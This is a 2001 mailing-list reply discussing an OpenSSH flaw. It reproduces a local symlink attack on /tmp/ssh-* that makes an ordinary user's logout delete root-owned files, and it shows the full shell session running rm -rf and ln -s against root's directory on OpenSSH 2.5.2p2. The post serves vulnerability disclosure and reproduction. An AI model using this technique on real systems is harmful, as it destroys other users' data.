Re: SSH allows deletion of other users files...
On Mon, Jun 04, 2001 at 04:03:51PM -0500, Leonard Leblanc wrote:
> > [root@clarity /root]# touch /cookies;ls /cookies
> > > /cookies
> > > [root@clarity /root]# ssh zen@localhost
> > > zen@localhost's password:
> > > [zen@clarity zen]$ rm -r /tmp/ssh-XXW9hNY9/; ln -s / /tmp/ssh-XXW9hNY9
> > > [zen@clarity zen]$ logout
> >
> > > [root@clarity /root]# ls /cookies
> > > /bin/ls: /cookies: No such file or directory
> >
> > I could not duplicate this with OpenSSH 2.9p1-1 on Red Hat 6.2
> >
>
> I could not duplicate this with OpenSSH-1.2.3, protocol version 1.5 on a
> Debian box.
hmm... it appers to work on my system too...
alm:~$ id
uid=1000(alson) gid=1001(friends) groups=1001(friends)
alm:~$ su -
Password:
alm:~# mkdir /root/secret
alm:~# chmod 700 /root/secret
alm:~# chmod 600 /root/secret/cookies
alm:~# ls -l /root/secret/
total 0
-rw------- 1 root root 0 Jun 5 00:04 cookies
alm:~# logout
alm:~$ ssh localhost
alson@localhost's password:
alm:~$ rm -rf /tmp/ssh-XXoadRxj
alm:~$ ln -s /root/secret /tmp/ssh-XXoadRxj
alm:~$ exit
Connection to localhost closed.
alm:~$ su -
Password:
alm:~# ls -la /root/secret
total 3
drwx------ 2 root root 1024 Jun 5 00:07 .
drwx------ 33 root root 2048 Jun 5 00:04 ..
alm:~# sshd -V
sshd: option requires an argument -- V
sshd version OpenSSH_2.5.2p2
Usage: sshd [options]
...
alm:~# logout
alm:~$ ssh -V
OpenSSH_2.5.2p2, SSH protocols 1.5/2.0, OpenSSL 0x0090601f
BTW: I use the ssh2 protocol by default, so it's used here too
Don't call your important files cookies ;)
--
,-------------------------------------------.
> Name: Alson van der Meulen <
> Personal: alson@linuxfreak.nl <
> School: alson@gymnasiumleiden.nl <
`-------------------------------------------'
Do you smell something?
---------------------------------------------
Reply to: